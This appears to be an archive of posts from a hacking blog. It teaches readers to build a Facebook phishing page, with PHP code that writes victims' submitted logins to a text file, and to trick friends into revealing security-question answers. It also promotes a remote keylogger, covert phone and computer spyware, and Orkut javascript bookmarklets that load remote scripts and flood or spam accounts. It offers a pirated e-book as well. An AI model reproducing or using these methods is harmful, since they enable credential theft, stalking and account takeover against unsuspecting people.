Now you all can invite me on skype for any kind of help required as my username is krackoworld


Showing posts with label Hack Orkut. Show all posts
Showing posts with label Hack Orkut. Show all posts

31 July 2013

How to Bypass Mobile Phone Number Verification


bypass mobile number verification Are you Looking for Mobile Phone Number Verification to save your own personal information to be leaked out? If yes, then post is all yours! Now a days its being the main criteria of popular websites like Gmail, Facebook and many more to get yourself verified via Mobile Number Code Sent, hence to avoid it there are so many sites exits which can create your secret mobile number online and access to your inbox etc. There today I am going to mention that sites to bypass mobile phone number verification easily by making a free account on them. Have a look!

Some Benefits of these Sites to Bypass Mobile Number:

1. Bypass Gmail Mob. Number Verification

2. Bypass Facebook Mob. Number Verification

3. Bypass YouTube Mobile Number Verification

4. Bypass Skype Verification

5. Bypass Ymail, Rediff, Elance and many more

Top Sites to Bypass Mobile Number Verification are-

1. Pinger

2. Receive SMS Online

3. Lleida Free SMS

4. Sellaite SMS Receiver

That's it! Enjoy…



25 May 2012

Top 26 Orkut JavaScript's Hacks of 2012


Orkut as you all knows ancient Facebook for todays people and now a days runs very low as compared to Twitter, Google plus and Facebook. Orkut is a social division of Google and sucks due to its high loading time, system and old style chat box. It also comes with many loopholes, bugs in hacking, therefore i will show some of its JavaScript's hack of 2012 ( the updated one) today among you people. Hope you all will like and enjoy it.

Top 26 Orkut Hacks of 2012:

Scrap All
Just open orkut page and copy this script in URL bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/photo.js';void(0)
Hit enter.
It sends scrap to all the friend's automatically.

Unlock Any Scrapbook
Just open orkut page and copy this script in URL bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/scrapbook.js';void(0)
Hit enter.
It unlocks all scrapbooks automatically.

Unlock Any Album
Just open orkut page and copy this script in URL bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/album.js';void(0)
Hit enter.
It unlocks all albums automatically.

Increase your fans
Just open orkut page and copy this script in URL bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/fans.js';void(0)
Hit enter.
It increase your fans within minutes.

Show Video Instead Of Profile Picture
Just open orkut page and copy this script in URL bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/video.js';void(0)
Hit enter.
It replaces video with your profile picture.

Scrapbook Flooder
Open scrapbook.
Write something in the text box.
Donot press submit
Copy the following java script into the URL bar.
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+='<iframe name="SbFlood" width="800" height="600"/>'; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value=nb1 + "[silver]" + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))
Hit enter.
Close the window or press refresh to stop the flooding.

Add a Friend
This code will add your friend automatically when you run this script.
Run the on your friend's profile whom you want to add.
Paste the script and run on the page you have opened(friend's profile).
javascript:add=document.forms[1];add.action='FriendAdd.aspx?Action.yes&'+location.href.match(/uid=\d*/gi);add.submit(); void (0)
Paste the script in URL and hit enter.You are done!!

Poll Flooder
Just open the Polls you to have flood and paste the script on address bar.javascript:inputs=document.getElementsByTagName('input');for(x=0;x<inputs.length;x++){tipo=inputs[x].type;if(tipo=="radio"){inputs[x].type="checkbox";inputs[x].checked="true"}};void(0)
Hit Enter.
After running this script all the options in the poll will be selected,then you have to press vote.So that you w'll be voting all the options at a time.
This Script which will flood all the options at once but only for one time.

Testimonial to All
This Script is used to send testi to all your friend's.
Open this Page and run the script.
Paste the following javascript in your web browser address bar after navigating to the specified orkut page.javascript:vi=document.getElementsByTagName('TEXTAREA').item(0).value;d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="/TestimonialWrite.aspx?&Action.submit&countedTextbox="+vi+"&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),5000))

Album Hack
This Script will show or display the pictures which are hidden in friend's profile.
Paste the following javascript in your web browser address bar after navigating to the specified orkut page. javascript:alert("Wait for few seconds for pic`s to load......");nb=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML="<center><font style='font-size:20'><b>hacking album...wait for a minute<br></b>http://www.fakers.co.nr</font>";for(i=1;i<=50;i++){document.body.innerHTML+='<img src="http://img3.orkut.com/images/milieu/'+i+'/0/'+nb+'.jpg"><br><br><br><br>';};void(0)

Mass scrap deleter
Open your scrapbook.
Copy the following java script into the URL bar.
javascript:i=0;document.body.innerHTML+='<iframe name="tio" width="800" height="600"></iframe>';window[0].location="http://www.orkut.com/Scrapbook.aspx?&pageSize=30";function nick(){document.forms[1].target="tio";window[0]._checkAll(window[0].document.scrapsForm, 'scrapKeys', true);window[0]._submitForm(window[0].document.forms[2], 'delete', '');window[0].location=window[0].document.links[20].href;};void(setInterval(nick,2000))
Hit enter.
Close the window or press refresh to stop the deleting.

Coloured scraps
Write anything in text box
Copy the script and paste it in URL bar.
Presss enter
Now submit the scrap
javascript:cor=new Array('green','red','blue','maroon');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp[l]+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n');void(0)

New way of writing
Write anything in text box
Copy the script and paste it in URL bar.
Presss enter
Now submit the scrap
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"α");txt.value=txt.value.replace(/p/gi,"ρ");txt.value=txt.value.replace(/N/gi,"и");txt.value=txt.value.replace(/t/gi,"т");txt.value=txt.value.replace(/E/gi,"є");txt.value=txt.value.replace(/u/gi,"υ");txt.value=txt.value.replace(/h/gi,"н");txt.value=txt.value.replace(/s/gi,"ร");txt.value=txt.value.replace(/o/gi,"σ");txt.value=txt.value.replace(/m/gi,"м");txt.value=txt.value.replace(/r/gi,"я");void(0);

Message Reverser
Open scrapbook
Write text in text box.
Copy the script in URL bar and hit enter.
Now submit the scrap
javascript:alert("Katyal Rocks");msgm=prompt("message");function reverse() { var inp = msgm; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}txt=document.getElementsByTagName('textarea')[0];txt.value=outp ;}; reverse();

Dictionary in orkut
Copy the script in URL bar and hit enter.
Write the desired word and get its meaning.
javascript:eval(String.fromCharCode(97, 61, 112, 114, 111, 109, 112, 116, 40, 34, 69, 110, 116, 101, 114, 32, 87, 111, 114, 100, 32, 84, 111, 32, 66, 101, 32, 83, 101, 97, 114, 99, 104, 101, 100, 32, 73, 110, 32, 68, 105, 99, 116, 105, 111, 110, 97, 114, 121, 34, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 105, 110, 110, 101, 114, 72, 84, 77, 76, 43, 61, 39, 60, 105, 102, 114, 97, 109, 101, 32, 110, 97, 109, 101, 61, 34, 97, 114, 115, 104, 34, 32, 119, 105, 100, 116, 104, 61, 34, 49, 48, 50, 52, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 55, 54, 56, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 39, 59, 119, 105, 110, 100, 111, 119, 91, 48, 93, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 100, 105, 99, 116, 105, 111, 110, 97, 114, 121, 46, 104, 109, 47, 115, 101, 97, 114, 99, 104, 95, 102, 117, 110, 99, 116, 105, 111, 110, 46, 112, 104, 112, 63, 113, 61, 34, 32, 43, 97));void(0)

Profile without picture
Use this script while you are in cropping stage
javascript:i=document.getElementsByTagName('input');i['apw'].value="1";i['aph'].value="1";i['apx'].value="0";i['apy'].value="0";i['apdw'].value=crpImg.width;i['apdh'].value=crpImg.height;_submitForm(document.getElementById('cropForm'),'crop');void(0)

Album flooder
Goto http://www.orkut.com/Album.aspx
Then browse pic which u want to flood after selection run this script.
javascript:function devil(){_submitForm(document.forms[1], 'upload', '');}void(setInterval(devil,350));

Vibrator in orkut
Just open orkut page and copy this script in URL bar.
javascript:function flood(n) {if (self.moveBy) {for (i = 20; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(10);{ var inp = "!!!skcoR llA parcS"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
Hit enter.

Add all to your hot list
Just open orkut page and copy this script in URL bar.
javascript:d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="Profile.aspx?Action.addHot&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),2000))
Hit enter.

Add all to your ignore list
Just open orkut page and copy this script in URL bar.
javascript:d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="Profile.aspx?Action.addIgonre&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),2000))
Hit enter.

Add all ur friends to ur crush list
Open this Page and run the script.
Allow all pop ups of orkut.com
javascript:d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="Profile.aspx?Action.addCrush&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),2000))

Empty ur crush list
javascript:i=0;document.body.innerHTML+='<iframe name="nobody" width="800" height="600"></iframe>';window[0].location="/Marks.aspx?mid=3";function nb(){document.forms[1].target="nobody";window[0]._submitForm(window[0].document.forms[1], 'delete', '');};void(setInterval(nb,2000));

View UID's of all friends
Copy the script in in friend's list.
Hit enter
javascript:var text_LoL = document.body.innerHTML.match(/uid=\d+/gi);var text_LoL = text_LoL.join();var text_LoL = text_LoL.match(/\d+/gi);var text_LoL_1 = "";for (index_1 = text_LoL.length-1;index_1 >= 0;index_1--){if (text_LoL_1.indexOf(text_LoL[index_1]) == -1) {text_LoL_1 = text_LoL_1 + '"' + text_LoL[index_1] + '",<br>'} else {text_LoL_1 = text_LoL_1}};document.write(text_LoL_1)

View all community ids
Copy the scipt in communities page.
Hit enter.
javascript:var text_LoL = document.body.innerHTML.match(/cmm=\d+/gi);var text_LoL = text_LoL.join();var text_LoL = text_LoL.match(/\d+/gi);var text_LoL_1 ="";for (index_1 = text_LoL.length-1;index_1 >= 0;index_1--){if (text_LoL_1.indexOf(text_LoL[index_1]) == -1) {text_LoL_1 = text_LoL_1 + '"' +text_LoL[index_1] + '",'} else {text_LoL_1 = text_LoL_1}};

Post same topic in selected communities
Paste all the community UID,s in the given format cmm=['42454897','5866948']; (even a comma makes a difference)
Open any non-anonymous community
Type the Subject and Body[colour and smileys allowed]
Run the script and allow all pop ups.
javascript:var text_LoL = document.body.innerHTML.match(/cmm=\d+/gi);var text_LoL = text_LoL.join();var text_LoL = text_LoL.match(/\d+/gi);var text_LoL_1 ="";for (index_1 = text_LoL.length-1;index_1 >= 0;index_1--){if (text_LoL_1.indexOf(text_LoL[index_1]) == -1) {text_LoL_1 = text_LoL_1 + '"' +text_LoL[index_1] + '",'} else {text_LoL_1 = text_LoL_1}}; You will find the topic(posted by you) in all the selected communities

See your signature and token id
Copy the script in scrapbook URL bar and hit enter.
javascript:df=document.forms[1];df.scrapText.value='Signature: ' +df.signature.value+'\nPost Token: '+df.POST_TOKEN.value;void(0)

The end!



16 January 2012

What is Social Engineering?


Social engineeringIn simple words, Social Engineering is an art of stealing someone's personal information and data in legal way. Hence, it means to know the person's security question answers by just querying him as usually. Always keep in mind that your victim should not be aware of this and only perform this attack when your victim is a good friend of you properly. This attack is now a days very famous and generally tried by newbie hackers. So therefore I decided to write a brief post on it.

What to Gain before doing this attack-

All you have to gain trust or be in a good relation with your victims.

How to perform this attack?

Before doing this attack, simply check your victims security question and other information by just going to his/her any registered account for ex- Facebook and now click on forgot password, then enter his/her email id and click submit. Now the next page is about your victims password retrieving methods like by security question, primary email address, mobile verification etc..Hence After that, follow the below steps carefully.

1. First of all simply chat with your friend (victim) as usual.

2. Now in the talk, simply refer to him about security question answer. for ex- if its security question is what is your library card number?, then just say that can I issue little bit books from your library card no. as my one is stolen. If he/she says yes, then just ask library card no. and say thank you to it.

3. Now once you get its security question answer, simply input it at forgotten password and reset it with your once.

That’s it! Enjoy….



21 December 2011

Download SniperSpy for MAC Users


Well SniperSpy Mac is the cutting-edge solution or software to expose the truth on a Mac OS X based computer. After you install the hidden logger program onto the Mac, it will begin silently recording ALL activities and upload them to a secure online account. You can view logs from any other computer, smartphone or web browser. Activities recorded include keystrokes typed and complete chat conversations in iChat, Yahoo! Instant Messenger, AIM and Skype. Also recorded are websites visited, applications ran and pasteboard logs. The program also captures screenshots for a graphical representation of the activity. Unlike any other Mac monitoring software, SniperSpy Mac allows you to securely perform LIVE surveillance and control on your remote Mac from anywhere. You can also view the remote screen like a television and perform other commands instantly.

Steps to install it -

1. First of all you need an account on the SniperSpy Mac server. Go to the Register Account page to create your username and password. This step can be done from any computer or smartphone web browser.

2. On the target Mac you intend to monitor, download the SniperSpy Mac Logger Application here.

3. Once the Logger downloads, double-click the logger.pkg file to execute the installer…

4. Follow the on-screen prompts to complete the installation below.

sniperspy inst

5. After the program is successfully installed, the Logger window will open. At this point, input your username and password and click Verify. Then proceed to configure Sniper Spy to suit your needs. Make sure to click Save anytime you make a change.

6. Once you have configured the Logger to suit your needs, allow 15 minutes to pass before checking your logs for new records. To view your records, you will need to sign into your online viewer account.

For more help, check out the SniperSpy Mac User Guide.

Editors Choice- 4.5/5.0

Also see Sniperspy for PC here and for mobile at here.



07 October 2011

What is Shoulder Surfing and Guessing ?


At our site, there are many topics which are discussed commonly here like phishing,keylogging,cookie stealing,JavaScript etc. but today I am going to discuss 2 other methods which are also responsible for hacking and cracking of passwords. One is Shoulder surfing and other is Guessing mainly.

1. Shoulder Surfing

When you type your password make sure that there is no one behind you attempting to peak and seeing what you are typing. If there is, turn around and warn him/her to not to do it again or wait until he goes from that particular place. Also, make sure you don’t keep any sticky notes laying around that have your password or password hints on them.


2. Guessing

To prevent this attack from happening, never use a password like your birth date, your mobile number, your mother’s maiden name, your pets name, your spouse’s name, or anything that someone may be able to guess easily. Also note- Never use passwords with orderwise digits, for ex – 12345678 etc..

……………………………………………………………………………………………………………………………………………………………



13 August 2011

Learn How to Make a Phishing Page for any Website


fake login pageAs I mention earlier in my previous posts that Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. This is similar to Fishing, where the fisherman puts a bait at the hook, thus, pretending to be a genuine food for fish. But the hook inside it takes the complete fish out of the lake. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Around 50% of the accounts in todays world is get hacked by this process.. that is why Phishing is considered as the simplest and easiest way of Hacking someone sensitive information. Below is the complete tutorial on it.

How to make a Phisher or Phishing/Fake Page:

1. First Open any website which you want to make phisher/ fake login page.

for eg : Facebook.com
2. Now do right click and save the page.
3. Then open that page in notepad, search for "action = http://" and change the following address to login.php and also change method = " Post" to "GET" and hit save.
 

4. After editing save the page as "index.html"
5. Now its time to create login.php . Open any blank notepad and copy/paste this below code and save it as login.php

header ('Location: http://google.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Note :- By default the victim will be redirected to google.com once he clicks login ,If you want you can change the address you can do it by changing the www.google.com to any address you want.

6. Now create a simple and empty text file in notepad and save it as log.txt

7. Now create your own free web hosting account at my3gb.com or 110mb.com or 000webhost.com and upload all the three files.

8. Upload Index.html , login.php , log.txt we created in the above steps.

9. We are done, our phisher / fake login page is ready to use….

How to Hack Accounts ?

Send the index.html (the uploaded one) link to your victim , once he/she will enter his/her information and do login with our fake login page, then every thing will be stored in the log.txt file placed in your hosting account, now open log.txt to see all the Login details.

Its very simple to create phisher/fake login page for any website, Here i have taken the example of Facebook Phisher . But in this same you can also create the phisher of many websites like yahoo, Gmail, orkut etc..

If you face any problem then please tell me by commenting. Have Fun !



30 June 2011

Hack Facebook,Gmail,Yahoo,Twitter Email ID And More Via Remote Keylogger


loggerAfter searching a lot of keyloggers and writing a beautiful post on “one of best 2011 keylogger” known as Sniperspy,Today I am presenting you a new type of keylogger which can be installed remotely to hack Accounts at once. In Sniperspy Keylogger the only problem exists that we have to install it physically which may be risk full and not so easy to do in absence of your victims. But now,this problem does not occur as my new remote keylogger(FUD Keylogger) has the capacity to hack Facebook,Gmail etc Accounts without installing it physically.All we have to send it via internet by uploading it to any data sharing site.

 

 

Features :

  • Cookie stealing
  • See passwords stored in victims computer
  • You Can Use Gmail Account to get the logs and Activity details
  • Add To Start Up also included
  • It also Kills Task Manager
  • Automatically Hides the virus after infecting the victim
  • Also Disables Registry Editing
  • Stops victim From Ending Your Keylogger's Process
  • New Icon Changer
  • File Binder
  • With Fake Error Message
  • Includes Time Interval

How To Use it :

1.First of all Download this Remote FUD Keylogger Here and Then Extract it to a specified folder.
2.Now open the keylogger and enter your Gmail username with password in order to get all the information about your victims Computer.
3. Then tick mark the options you want to use to hack accounts and set the time interval to 2 minutes.
4.You can also change the name of file which you are going to generate as you want to fool your enemy(by default it is logger.exe).
5.All done,hence click on build and now you can see a file generated it that folder with your given name.
6.Upload that particular file(.exe file) to any sharing site like mediafire.com,ziddu.com etc.
7.Finished,just send the downloading link to your file to your enemy and ask him to download it for various purposes and when it opens the file,all its activities,keys,logs,cookies and more information will be sent to your Gmail account within 2-5 hours.

File Size :

This software or keylogger comes in very small size of 200 Kilobytes.

 

Enjoy & don’t forgot to comment or Subscribe to our Email updates.



09 June 2011

What to do when your Gmail Account is Hacked ?


gmail-password-hackedWith the tremendous increase in the hackers over 2008-2011, Security is being the major problem among the people who don’t even know hacking and are newbies. It should be any time when your Account is being hijacked or hacked by an person(usually hacker). As Google provides Gmail which offers good services and facilities than any other, so most of the people are on it. Being hacked by Google account means you lost your other accounts associated with Gmail also like Orkut, Google Checkout, Blogger, AdSense, Google Docs, Picasa accounts etc. So Here are the 3 options suggested by the Google Support team should be taken when you forget your Gmail password or if someone else takes ownership of your Google Account and changes the password:

1. Reset Your Google Account Password

Type the email address associated with your Google Account or Gmail user name at Gmail Forgot Password Link – you will receive an email at your secondary email address with a link to reset your Google Account Password. This will not work if the other person has changed your secondary email address or if you no longer have access to that address.

2. For Google Accounts Associated with Gmail

If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.

For Knowing how to find your Gmail Creation date, Please Follow the below steps-

1.By Using Gmail Welcome Mail:
Whenever you create an gmail account you will get a welcome mail from gmail team. So,here is the tip ,this “Welcome Mail” has the same date as your Gmail account creation date.To get this mail and there by the date,Go to Gmail inbox and hit on Oldest
button to get the last message. This message will be welcome mail from Gmail Team.You can note this mail date and this will be your gmail creation date.
But,the problem arises when if you are deleted the welcome mail from you inbox.If you done so the above method will not help you to find the gmail creation date.so read the below method.

2.By Using POP:
This method will work only for accounts created after 2007.
Go to Settings -> Forwarding and POP/IMAP and
under POP Download, look for:
Status: POP is enabled for all mail that has arrived
since “Your Account Creation Date”

Your account creation date can be noted and it will be your Gmail creation date.

3. For Hijacked Google Accounts Not Linked to Gmail

If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message. It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.

SmileComments are Welcomed below and don’t forgot to subscribe our Regular email updates to stay connected with us forever and enjoying the every step of hacking plus Security Tips.



27 May 2011

Download ‘The Hackers Underground Handbook’ For free of Cost


learn_to_hackNow a days,learning Hacking or becoming a perfect hacker is something quite difficult to do due to many reasons like lack of knowledge,interest,money problem etc. Thus everyone wants to become a hacker but actually they are not because either they need a good trainer or an Book. Since books are very costly to purchase in todays world. Therefore I Bring you an E-book of Mr.David which costs around  $20 at http://learn-how-to-hack.net/ and with my skills I hacked it one and giving my readers for free of cost for completing their dreams.

How To Hack : Learn Hacking From Professional Book Free .

The Hacker’s Underground Handbook will guide you through password hacking, windows hacking, malware, phishing, web hacking, network hacking and Linux (intro, installation, etc.). .

The Hacker's Underground Handbook which contains information unknown to 99.9% of the world will teach you the hacker's ways.

A great starting book which will guide you in the right direction, helping you understand the basic concepts of computer security and matters that you should take in consideration.

Other Benefits of this E-book-

1.You will be started to thing like Hackers

2.Full Covered topics on Ethical hacking and Cyber security

3.Extra knowledge in the field of hacking what 0.1% people have

Download it Here

And also subscribe to our Email via this box given below for getting more E-books at free of cost.

Subscribe via Email

 

Enjoy !



08 April 2011

Hack Accounts,GPS Locations,SMS and Many more With Mobile- Spy


mobilespy (1)Every day I get a lot of emails from people asking how to spy on cell phone or How to hack a cellphone. To spy on a given cell phone all you need to do is install a good cell phone spy software on the target cell phone and once you do this you can silently record every SMS and information about each call. You can also see GPS positions every thirty minutes. Therefore we come with an intelligent software named as Mobile spy.

Mobile Spy is the next generation of smartphone spy software. Do you suspect that your child or employee is abusing their SMS or vehicle privileges? If yes, then this software is ideal for you. Install this small program directly onto your compatible smartphone you want to monitor to begin recording.Using the Internet capabilities of your phone, recorded activities, logs and GPS locations are quickly uploaded to your Mobile Spy account. To view the results, you simply login to your secure account at the Mobile Spy web site. Logs are displayed by categories and sorted for easy browsing.The software is completely stealth and works independently. Mobile Spy does not rely on the phone's call and message logs to record activities. So even if the user tries to delete their tracks, the data will still be retained and uploaded. Compatible with most models of iPhone, BlackBerry or Android phones! Also compatible with Windows Mobile, Symbian OS and iPad.


Why Mobile Spy?
There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy software's and based on the results we conclude Mobile Spy as be the best one.

 

Here is an overview of the entire process:

Mobile Spy is a hybrid software/service which allows you to monitor your smartphone in real time. This unique system records the activities of anyone who uses your compatible iPhone, BlackBerry, Android, Windows Mobile or Symbian OS smartphone. You install a small application onto your phone. It starts at every boot of your phone but remains stealth and does not show up in the running process list.
After the software is setup on your phone it will record an array of phone activities and then silently upload the data to your private Mobile Spy account using the Internet. When you want to view results, simply login to the Online Control Panel from any computer and enter your username and password to proceed.
Mobile Spy Features:

This powerful system gives you the ability to spy a cellphone and to monitor activities online in real time. Your logs are safely stored in your https-SECURED Mobile Spy account which is accessible only by you from any web browser using a username and password you create.
You can login anytime from any location to view results without needing access to the phone. The activities recorded are each described below. All activities include a date/time stamp and are searchable by phone number. All logs can be easily exported to CSV for importing to your database!
Calls Log
Each incoming and outgoing number is logged along with duration and time stamp.
SMS (Text Messages) Log
Every text message is logged even if the phone's logs are deleted. Includes full text.
GPS Locations Log


The device's current location is frequently logged using GPRS when signal available.
Web Site URLs Log
Each address visited in browser is logged. This feature is currently for iPhones only.
Log Summary
A summary of all activities can be shown along with separate viewers for each type.
The working of Mobile Spy is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.
Step 2- Install the downloaded cell phone spy software onto the target cell phone that you want to spy on. After the installation, spy software starts recording all the activities on the cell phone.
Step 3- Login to your online control panel to see the logs containing the recorded information.
Mobile Spy is fully compatible with the following cell phones
BlackBerry Phones
Android Phones
Apple iPhones
Windows Mobile Phones
Symbian OS 9.x and 8.x phones

Click Here for the Complete List of Compatible Phones. For more info on this product visit the Mobile Spy homepage with the link below Mobile Spy Homepage
So what are you waiting for? Go grab Mobile Spy now and start spying on any cell phone within hours. Visit the following link to order Mobile Spy Now!
Mobile spy - The Cellphone monitoring software

Download Here



11 January 2011

Hack anyone Accounts with Sniperspy- Best Keylogging Software 2011


KeyloggingEasiest and the Best Way to Hack Facebook,Orkut,Twitter,Gmail,Yahoo and More Passwords with Accounts:-

Keylogging refers to simply recording each and every keystroke that is typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack anyone password. Therefore I recommend you the best keylogging software  named as SniperSpy as the best for gaining access to hack passwords.

SniperSpy is a revolutionary product that will allow you to easily access *ANY* online accountor password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!


Why SniperSpy is the best?

Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE
. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected.



Here is a summary of benefits that you will receive with Sniperspy software-
1. Access ANY Password

With SniperSpy you can hack any password and gain access to Facebook or any other online account.

2. Monitor Every Activity

You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.

3. Never Get Caught

SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught

4. Remote Installation Feature

With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.

5. Extremely Easy to Use

Installing and using SniperSpy is simple and needs no extra skill to manage.

6. Completely Safe to Use

This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.

7. Works on both Windows and Mac

Fully compatible with Windows 2000/XP/Vista/7 and Mac.

So what are you waiting for? If you are really serious to hack anyone password ,then SniperSpy is for you. Go grab it now and expose the truth!




Get Orkut Scraps via Sms Free


Now get all your Orkut scraps via Mobile as Sms for Free by just following the steps given below:-


Step 1:
First of all you have to get the feed url of your Orkut profile by using orkutfeeds.com.

For this, just open your Orkut profile and copy the home page link (for e.g. http://www.orkut.co.in/Main#Profile?rl=ls&uid=16295694097440977081
Step 2:
Now go to orkutfeeds.com and paste your Orkut profile link (already generated in step 1).





After this, just hit the subscribe button and you’ll be provided with your Orkut profile feed url (In my case, it is 
 http://www.orkutfeeds.com/feed.php?url=http%3A%2F%2Fwww.orkut.co.in%2FProfile.aspx%3Fuid%3D16295694097440977081

Step 3:
Also add “#both” at the end of the above URL so that you can get messages of the scrap as well.
Now my Feed URL becomes- http://www.orkutfeeds.com/feed.php?url=http%3A%2F%2Fwww.orkut.co.in%2FProfile.aspx%3Fuid%3D16295694097440977081#both
Step 4:
Now go to Google SMS channels homepage and create a new channel as shown in the screen shot below. If you don’t have an account on SMS channels then create one by logging in with your Gmail password.




Step 5:
Fill all the required details and feed URL of your Orkut page (refer step 2) on the ‘RSS/Atom feed’ form and finally hit the ‘create channel’ button.

That’s it! Now you’ll be getting scrap notifications via SMS for life .
Note:-

For this trick to work on locked scrapbooks, you must add this Orkutfeeds bot as your friend.
Scrap notification are delayed for 2-4 hours depending on the Google’s server traffic.


Dont forgot to comment to help us to serve you better...



13 December 2010

Hack Orkut,Facebook,Gmail,Yahoo Accounts via Phishing Attacks


Hack Orkut,Facebook,Gmail and Yahoo accounts via our latest phishing attacks.


Introduction

Phishing is the most commonly used method to hack Facebook,orkut,gmail,yahoo etc. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo , Gmail, MySpace etc. The victim is fooled to believe the fake page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack anybody account since it is the easiest one.

Phishing Procedure:

First of all download
      2. Facebook Login Page
4. Yahoo Login Page
5.If you want any other website login page ,you can also contact me at my email id.

For Example If you have downloaded Orkut login page,then try this procedure given below-
1. Once you have download Orkut fake login page, Extract contents in a folder separately.
2. Create an account at www.my3gb.com.
3. Now Upload the Data to www.my3gb.com.
4. You can use www.110mb.com ,www.ripway.com or www.t35.com  also for uploading if you are banned from other sites.
5. Now copy the url of orkut.htm and send it to your friends for making them to click or join that.
6. When they enter his/her login information into that page, all the information will be sent to your www.my3gb.com account where the other files are uploaded.
7. See victims login information at a new document named generally password.txt in your account that has been created.
Note- You can use this technique to any other fake login pages also by doing some small changes…
That’s It……….Enjoy!!!
Don’t forget to leave a comment.


08 November 2010

Fun Orkut




1.Orkut tips and tricks-









I recommend u doing all the tricks on Opera Browser
.. it supports java scripts the most efficient way.





No need to install Ny "greesymonkey" scripts.. it works well wid all the browsers




1)The Most Wanted







  • Orkut Flooder





  1. please dont missuse this code

  2. your account will get freezed for some time

  3. who cares
copy and paste this code in your Scrapbook's Address Bar


javascript:i=0;sar=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='';document.forms[1].target='TextFlooding';setInterval(" document.getElementsByTagName('TEXTAREA').item(0).value=sar +' '+ i;a=submitForm(document.forms[1], 'submit', '');i++",2000);void(0)


COMPLETELY WORKING.. PLEASE LEAVE COMMENTS IN CASE OF ANY PROBLEM..




Trick Number Two "STAR":
Try &amp;#9733 in your scrap book editor box above your Scraps and Write Your Message


Voila!! a STAR comes up Before ur Message. isnt it Cool


Drop in Your Comments Please

also see trick : 21





3 ) Secret Writings in Orkut :


I came across the tip some time back which will allow you to write scraps in reverse order... more like mirror image llits quite common now but Still


